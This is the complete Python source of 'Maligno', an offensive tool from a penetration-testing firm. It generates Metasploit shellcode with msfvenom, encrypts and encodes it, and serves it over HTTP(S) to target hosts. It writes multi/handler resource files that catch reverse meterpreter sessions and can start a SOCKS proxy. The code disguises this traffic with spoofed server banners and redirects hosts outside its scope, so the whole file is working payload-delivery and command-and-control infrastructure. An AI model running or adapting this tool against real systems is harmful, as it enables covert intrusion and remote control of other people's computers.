#!/usr/bin/python

################################################################
#                                                              #
# Maligno - A Metasploit payload server                        #
# written by Juan J. Guelfo @ Encripto AS                      #
# post@encripto.no                                             #
#                                                              #
# Copyright 2013-2014 Encripto AS. All rights reserved.        #
#                                                              #
# Maligno is licensed under the FreeBSD license.               #
# http://www.freebsd.org/copyright/freebsd-license.html        #
#                                                              #
################################################################



import re, os, base64, subprocess, sys, ipcalc, ssl, time, signal, urllib
import xml.etree.ElementTree as ET
from Crypto.Cipher import AES
from datetime import datetime
from urlparse import urlparse, parse_qs
from BaseHTTPServer import BaseHTTPRequestHandler
from BaseHTTPServer import HTTPServer


__version__ = "1.2"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"


def header():
    os.system("clear")
    
    print ""
    print " ================================================================= "
    print "|  Maligno v{0}: A Metasploit payload server\t\t\t  |".format(__version__)
    print "|  by {0}\t\t  |".format(__author__)
    print " ================================================================= "
    print ""

    
def check_file_exists(filename):
    if not os.path.exists(filename):
        print "[-] File \"{0}\" cannot be found.\n".format(filename)
        sys.exit()

        
def get_metasploit_config(config_file):
    check_file_exists(config_file)        
    tree = ET.parse(config_file) 
    root = tree.getroot()
    
    config = []
    for child in root.find("Metasploit"):    
        if child.text and child.tag != "msfpayload":
            config.append([child.tag, child.text])
    
    if not config:
        print "[-] No {0} sections have been found in {1}.".format("<Metasploit>", config_file)
        sys.exit()   
    
    config = dict(config)
    try:
        if not config["path"] or not config["cachefolder"] or not config["resourcefolder"]:
            raise KeyError
    
    except KeyError:
        print "[-] There is an error in your {0} configuration in {1}.".format("<Metasploit>", config_file)
        sys.exit()  
    
    return config

    
def get_payload_config(config_file):
    check_file_exists(config_file)        
    tree = ET.parse(config_file) 
    root = tree.getroot()
    
    tmp = []
    config = []
    msf = root.find("Metasploit")    
    for child in msf.findall("msfpayload"):    
        for c in child:
            tmp.append([c.tag, c.text])
           
        config.append(dict(tmp))
        
    if not config:
        print "[-] No {0} sections have been found in {1}.".format("<msfpayload>", config_file)
        sys.exit()   
    
    try:
        for p in config:          
            if not p["id"] or not p["payload"] or not p["lhost"] or not p["lport"] or not p["encoder"] or not p["badchars"] or not p["iterations"]:
                raise KeyError
        
    except KeyError:
        print "[-] There is an error in your {0} configuration in {1}.".format("<msfpayload>", config_file)
        sys.exit()    
        
    return config

    
def get_scope_config(config_file):
    check_file_exists(config_file)        
    tree = ET.parse(config_file) 
    root = tree.getroot()
    
    scope = []
    for child in root.find("Scope"):
        ip = child.text
        if ip:
            if ip.find("/") > -1:
                for c in ipcalc.Network(ip):
                    scope.append(str(c))
            else:
                scope.append(ip)
   
    return scope
    

def get_server_config(config_file):
    check_file_exists(config_file)        
    tree = ET.parse(config_file) 
    root = tree.getroot()
    
    config = []
    for child in root.find("Server"):    
        if child.text:
            config.append([child.tag, child.text])
    
    if not config:
        print "[-] No {0} sections have been found in {1}.".format("<Server>", config_file)
        sys.exit()   
    
    config = dict(config)
    
    try:
        if not config["addr"] or not config["port"] or not config["ssl"] or not config["sslcert"] or not config["proxy"] or not config["proxyport"] or not config["profile"]:
            raise KeyError
    
    except KeyError:
        print "[-] There is an error in your {0} configuration in {1}.".format("<Server>", config_file)
        sys.exit()  
    
    return config

    
def get_profile_request_config(profile_file):
    check_file_exists(profile_file)        
    tree = ET.parse(profile_file) 
    root = tree.getroot()
    
    config = []
    req = root.find("Server").find("Request")
    for child in req:    
        if child.text:
            config.append([child.tag, child.text])
    
    if not config:
        print "[-] No {0} sections have been found in {1}.".format("<Request>", profile_file)
        sys.exit()   
    
    config = dict(config)
    
    try:
        if not config["page"] or not config["parameter"]:
            raise KeyError
    
    except KeyError:
        print "[-] There is an error in your {0} configuration in {1}.".format("<Request>", profile_file)
        sys.exit()  
    
    return config

    
def get_profile_response_config(profile_file):
    check_file_exists(profile_file)        
    tree = ET.parse(profile_file) 
    root = tree.getroot()
    
    config = []
    resp = root.find("Server").find("Response")
    for child in resp:    
        if child.text and child.tag != "header" and child.tag != "body":
            config.append([child.tag, child.text])
    
    if not config:
        print "[-] No {0} sections have been found in {1}.".format("<Response>", profile_file)
        sys.exit()   
    
    config = dict(config)
    
    try:
        if not config["protocol"] or not config["banner"] or not config["lastresort"] or not config["errortemplate"]:
            raise KeyError
    
    except KeyError:
        print "[-] There is an error in your {0} configuration in {1}.".format("<Response>", profile_file)
        sys.exit()  
    
    return config

    
def get_profile_server_header_config(profile_file):
    check_file_exists(profile_file)        
    tree = ET.parse(profile_file) 
    root = tree.getroot()
    
    tmp = []
    config = []
    resp = root.find("Server").find("Response")
    for child in resp.findall("header"):    
        for c in child:
            tmp.append([c.tag, c.text])
           
        config.append(dict(tmp))
    
    return config    
    
    
def get_profile_network_config(profile_file):
    check_file_exists(profile_file)        
    tree = ET.parse(profile_file) 
    root = tree.getroot()
    
    config = []
    for child in root.find("Network"):    
        if child.text:
            config.append([child.tag, child.text])
    
    if not config:
        print "[-] No {0} sections have been found in {1}.".format("<Network>", profile_file)
        sys.exit()   
    
    config = dict(config)
    
    try:
        if not config["encoding"] or not config["rounds"] or not config["blocksize"] or not config["paddingchar"] or not config["secret"]:
            raise KeyError
    
    except KeyError:
        print "[-] There is an error in your {0} configuration in {1}.".format("<Network>", profile_file)
        sys.exit()  
    
    return config    

    
def get_profile_client_config(profile_file):
    check_file_exists(profile_file)        
    tree = ET.parse(profile_file) 
    root = tree.getroot()
    
    config = []
    for child in root.find("Client"):    
        if child.text:
            config.append([child.tag, child.text])
    
    if not config:
        print "[-] No {0} sections have been found in {1}.".format("<Client>", profile_file)
        sys.exit()   
    
    config = dict(config)
    
    try:
        if not config["useragent"]:
            raise KeyError
    
    except KeyError:
        print "[-] There is an error in your {0} configuration in {1}.".format("<Client>", profile_file)
        sys.exit()  
    
    return config 
    

def get_profile_client_header_config(profile_file):
    check_file_exists(profile_file)        
    tree = ET.parse(profile_file) 
    root = tree.getroot()
    
    tmp = []
    config = []
    resp = root.find("Client")
    for child in resp.findall("header"):    
        for c in child:
            tmp.append([c.tag, c.text])
           
        config.append(dict(tmp))
    
    return config
    
    
def pack_data(shellcode, cipher, profile_network_config, profile_response_config):
    
    block_size = int(profile_network_config["blocksize"])
    padding_char = profile_network_config["paddingchar"]
    encoding = profile_network_config["encoding"]
    encoding_rounds = int(profile_network_config["rounds"])
    prefix = ""
    suffix = ""
    
    try: 
        prefix = profile_response_config["prefix"]
        
    except KeyError:
        prefix = ""

    try:
        suffix = profile_response_config["suffix"]
    
    except KeyError:
        suffix = ""
    
    plaintext = shellcode + ":" + str(block_size) + ":" + padding_char
    padded = plaintext + (block_size - len(plaintext) % block_size) * padding_char
    ciphertext = cipher.encrypt(padded)

    if encoding == "base64":
        for i in range(0, encoding_rounds):
            ciphertext = base64.b64encode(ciphertext)
    
    elif encoding == "hex":
        for i in range(0, encoding_rounds):
            ciphertext = ciphertext.encode("hex")
    
    elif encoding == "bin":
        ciphertext = ciphertext.replace("\n", "<R=%")
    
    else:
        print "\n[-] No valid encoding server config parameter found. Using Base64 by default..."
        for i in range(0, encoding_rounds):
            ciphertext = base64.b64encode(ciphertext)
    
    ciphertext = urllib.unquote(prefix.rstrip().lstrip()) + ciphertext + urllib.unquote(suffix.rstrip().lstrip())

    return ciphertext


def generate_shellcode(metasploit_config, server_config, msfpayload):

    msf_path = metasploit_config["path"]
    msf_payload = msfpayload["payload"]
    msf_lhost = msfpayload["lhost"]
    msf_lport = msfpayload["lport"]
    msf_encoder = msfpayload["encoder"]
    msf_bad_chars = msfpayload["badchars"]
    msf_iterations = msfpayload["iterations"]
    proxy_srv = server_config["addr"]
    proxy_port = server_config["proxyport"]
    
    if msf_payload.find("https_proxy") > 0:
        p = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s EXITFUNC=thread PROXYHOST=%s PROXYPORT=%s  PROXY_TYPE=SOCKS -e %s -i %s -f c -b '%s'" % 
            (msf_path, msf_payload, msf_lhost, msf_lport, proxy_srv, proxy_port, msf_encoder, msf_iterations, msf_bad_chars), stdout=subprocess.PIPE, shell=True)
    else:
        p = subprocess.Popen("%smsfvenom -p %s LHOST=%s LPORT=%s EXITFUNC=thread -e %s -i %s -f c -b '%s'" % 
            (msf_path, msf_payload, msf_lhost, msf_lport, msf_encoder, msf_iterations, msf_bad_chars), stdout=subprocess.PIPE, shell=True)
        
    s = p.communicate()[0].split("unsigned char buf[] = ")[1]
    
    return s.replace("\n", "").replace('"', "").replace(";", "").replace("+", "").replace(" ", "").rstrip()


def generate_resource_file(server_config, metasploit_config, profile_response_config, profile_client_config, msfpayload):

    resource_folder = metasploit_config["resourcefolder"]
    payload = msfpayload["payload"]
    host = msfpayload["lhost"]
    port = msfpayload["lport"]
    srv_banner = profile_response_config["banner"]
    user_agent = profile_client_config["useragent"]
    
    error_template = profile_response_config["errortemplate"]
    proxy_srv = server_config["addr"]
    proxy_port = server_config["proxyport"]
    
    check_file_exists(error_template)
    
    ft = open(error_template, 'r')
    error_msg = ft.read().replace("\n", "").rstrip().lstrip()
    ft.close() 
    
    try:
        p = payload.replace(" ", "").split('/')
        resource_file = "%s_%s_%s.rc" % (str(p[-1]), host, port)
        
        if not os.path.exists(resource_folder):
            os.makedirs(resource_folder)
        
        resource_path = "%s/%s" % (resource_folder, resource_file)
        fw = open(resource_path, 'w')
        
        fw.write("use exploit/multi/handler\n")
        fw.write("set PAYLOAD " + payload + "\n")
        fw.write("set LHOST " + host + "\n")
        fw.write("set LPORT " + port + "\n")
        fw.write("set EXITFUNC thread\n")
        fw.write("set EnableStageEncoding true\n")
        fw.write("set SessionCommunicationTimeout 0\n")
        
        if payload.find("http") > 0:        
            fw.write("set MeterpreterServerName \"" + srv_banner + "\"\n")
            fw.write("set MeterpreterUserAgent \"" + user_agent + "\"\n")
            fw.write("set HttpUnknownRequestResponse \"" + error_msg + "\"\n")
        
        if payload.find("https_proxy") > 0:        
            fw.write("set PROXYHOST " + proxy_srv + "\n")
            fw.write("set PROXYPORT " + proxy_port + "\n")
            fw.write("set PROXY_TYPE SOCKS\n")        
            
        fw.write("set ExitOnSession false\n")
        fw.write("exploit -j -z\n")            
        fw.close()
        
    except IOError:
        print "[-] Could not generate metasploit resource file."
        
    except OSError:
        print "[-] Could not create metasploit resource folder."
    
    return
    

def store_package_in_cache(cache_folder, cache_file, default_file, package):
    try:
        
        if not os.path.exists(cache_folder):
            os.makedirs(cache_folder)
        
        cache_path = "%s/%s" % (cache_folder, cache_file)
        default_path = "%s/%s" % (cache_folder, default_file)
        fw = open(cache_path, 'w')
        fw.write(package)
        fw.close()
        
        if not os.path.isfile(default_path):
            fw = open(default_path, 'w')
            fw.write(package)
            fw.close()
        
    except IOError:
        print "[-] Could not store package in cache."
        
    except OSError:
        print "[-] Could not create metasploit cache folder."
    
    return
    

def read_package_from_cache(cache_path):
    package = ""
    try:
        fr = open(cache_path, 'r')
        package = fr.readline()
        fr.close()
    
    except IOError:
        print "[-] Could not find {0}.".format(cache_path)
    
    return package

    
def start_socks_proxy(msf_path, port):
    p = subprocess.Popen("%smsfcli auxiliary/server/socks4a SRVPORT=%s VERBOSE=true E" % (msf_path, port), stdout=subprocess.PIPE, shell=True)
    
    return p

    
class GetHandler(BaseHTTPRequestHandler):

    def do_GET(self):
        
        self.server_version = profile_response_config["banner"]
        self.sys_version = ""
        
        if profile_response_config["protocol"] == "HTTP/1.1":
            self.protocol_version = "HTTP/1.1"
        
        print "==================================================================="
        print "\n[{0}]".format(datetime.now().strftime("%d/%m/%y - %H:%M:%S"))
        print "\n[*] New request from {0}...".format(self.client_address[0])
        
        # If the request came from a host in scope, then process it
        if (self.client_address[0] in scope_config) or ("ANY" in scope_config):
            try:
                
                # The server should process requests with a certain URL parameter
                # It does not matter what path the client requested, as long as it contains the parameter
                query = urlparse(self.path).query
                url_params = dict(q.split("=") for q in query.split("&"))
                payload_id = int(url_params.get(profile_request_config["parameter"]))
                
                
                # Select cache file 
                cache_file = str(payload_id)
                cache_path = "%s/%s" % (metasploit_config["cachefolder"], cache_file)
                if os.path.isfile(cache_path):
                    print "[+] Requested payload OK..."
                
                # Uses the first (default) generated payload if not found
                else:
                    cache_path = "%s/%s" % (metasploit_config["cachefolder"], default_file)
                    print "[-] Requested payload not found. Using default payload instead..."
                    
                # Retrieve from cache    
                package = ""
                print "\n[*] Reading packed shellcode from {0}...".format(cache_path)
                package = read_package_from_cache(cache_path) 
                
                # Send the encrypted / encoded payload to the client
                print ""
                self.send_response(200)
                self.send_header("Last-Modified", self.date_time_string(time.time()))
                
                if profile_server_header_config:
                    for header in profile_server_header_config:
                        if header:
                            self.send_header(str(header["field"]).rstrip().lstrip(), str(header["value"]).rstrip().lstrip())
                                
                        else:
                            print "\n[-] There was a problem while parsing one of the server headers. Ingnoring it...\n"
                    
                if profile_response_config["protocol"] == "HTTP/1.1":
                    self.send_header("Content-length", len(package))
                    
                self.end_headers()
                self.wfile.write(package)
                print "\n[+] Package sent!"
                
            except ValueError:                
                print "\n[-] Request with unexpected format! Redirecting to last resort...\n"
                self.send_response(301)
                self.send_header("Location", profile_response_config["lastresort"])
                self.end_headers()
                
            except TypeError:                
                print "\n[-] Request with unexpected format! Redirecting to last resort...\n"
                self.send_response(301)
                self.send_header("Location", profile_response_config["lastresort"])
                self.end_headers()
            
        else:
            print "\n[-] Host not in scope! Redirecting to last resort...\n"
            self.send_response(301)
            self.send_header("Location", profile_response_config["lastresort"])
            self.end_headers()

        print "\n[*] End of request\n"
        print "==================================================================="
        return


if __name__ == '__main__':
    
    header()
    
    server_config_file = "server_config.xml"
    
    metasploit_config = get_metasploit_config(server_config_file)
    payload_config = get_payload_config(server_config_file)
    scope_config = get_scope_config(server_config_file)
    server_config = get_server_config(server_config_file)

    profile_request_config = get_profile_request_config(server_config["profile"])
    profile_response_config = get_profile_response_config(server_config["profile"])
    profile_server_header_config = get_profile_server_header_config(server_config["profile"])
    profile_network_config = get_profile_network_config(server_config["profile"])
    profile_client_config = get_profile_client_config(server_config["profile"])
    profile_client_header_config = get_profile_client_header_config(server_config["profile"])
    
    cipher = AES.new(profile_network_config["secret"])
    
    
    generated = 0
    index = 0
    for msfpayload in payload_config:
        index += 1
        print "[*] Generating and caching shellcodes: {0} of {1}...".format(index, len(payload_config)) 
        payload_generated = False
        while not payload_generated:
        
            try:
                print "[*] Generating msf resource file for {0}...\n".format(msfpayload["payload"])
                generate_resource_file(server_config, metasploit_config, profile_response_config, profile_client_config, msfpayload)
                
                print "[*] Generating {0} with msfvenom...\n".format(msfpayload["payload"])
                shellcode = generate_shellcode(metasploit_config, server_config, msfpayload)

                package = ""
                package = pack_data(shellcode, cipher, profile_network_config, profile_response_config)
                        
                cache_file = str(msfpayload["id"])
                default_file = "default"
                store_package_in_cache(metasploit_config["cachefolder"], cache_file, default_file, package)
                
                generated += 1
                payload_generated = True
                
            except IndexError:
                c = ""
                options = ["Y", "N", "y", "n"]
                while c not in options:
                    time.sleep(0.5)
                    
                    print "\n[-] There was a problem generating the payload with msfvenom."
                    c = raw_input("[*] Would you like to retry? [Y/N]: ")
                    
                    if c == "N" or c == "n":
                        payload_generated = True
                    
                    elif c == "Y" or c == "y":
                        print ""
        
        header()

    
    print "[*] Starting Maligno..."
    
    if not generated:
        print "[-] No shellcode has been generated."
        print "[-] Maligno cannot continue without shellcodes.\n"
        print "[-] Tip: Too many errors with msfvenom?"
        print "[-] Try to reduce the number of iterations and/or bad chars in your config file.\n"
        sys.exit()
    
   
    try:
        server = HTTPServer(('', int(server_config["port"])), GetHandler)
        
        # If ssl is enabled, try to locate the SSL cert file
        if server_config["ssl"] == "true" or server_config["ssl"] == "True":
            cert = open(server_config["sslcert"], 'r')
            cert.close()            
            server.socket = ssl.wrap_socket (server.socket, certfile=server_config["sslcert"], server_side=True)
            print "\n[*] SSL certificate file found. SSL enabled..."
            
        # Start proxy if enabled
        if server_config["proxy"] == "true" or server_config["proxy"] == "True":
            print "\n[*] Starting Metasploit socks4a proxy..."
            proxy_process = start_socks_proxy(metasploit_config["path"], server_config["proxyport"])            
            print "\n[*] Proxy listening on port TCP {0}...".format(server_config["proxyport"])
        
        print "[*] Server profile \"{0}\" loaded...".format(server_config["profile"].split('/')[-1])
        print "[*] Maligno is up and running. Press CTRL+C to stop...\n"
        server.serve_forever()
    
    except ValueError:
        print "[-] A valid port must be provided in server config.\n"
        sys.exit()
        
    except IOError as e:
        if e.errno == 2:
            print "[-] Could not find SSL certificate file: {0}.\n".format(server_config["sslcert"])
            
        else:
            print "[-] Error: {0}...\n".format(e.strerror)
            
        sys.exit()

    except KeyboardInterrupt: 
    
        # Remove cache files when interrupted
        print "\n[*] Removing cache files..."
        filelist = [ f for f in os.listdir(metasploit_config["cachefolder"]) ]
        for f in filelist:
            path = "%s/%s" % (metasploit_config["cachefolder"], f)
            os.remove(path)
        
        # Remove resource files when interrupted
        print "[*] Removing resource files..."
        filelist = [ f for f in os.listdir(metasploit_config["resourcefolder"]) ]
        for f in filelist:
            path = "%s/%s" % (metasploit_config["resourcefolder"], f)
            os.remove(path)
            
        # Stop proxy process if active
        if server_config["proxy"] == "true" or server_config["proxy"] == "True":
            print "[*] Stopping socks4a proxy (PID: {0})...".format(proxy_process.pid)
            try:
                os.killpg(proxy_process.pid, signal.SIGTERM)
                
            except OSError:
                print "[*] Process already killed..."
                
        print "[*] Stopping Maligno...\n"
        sys.exit()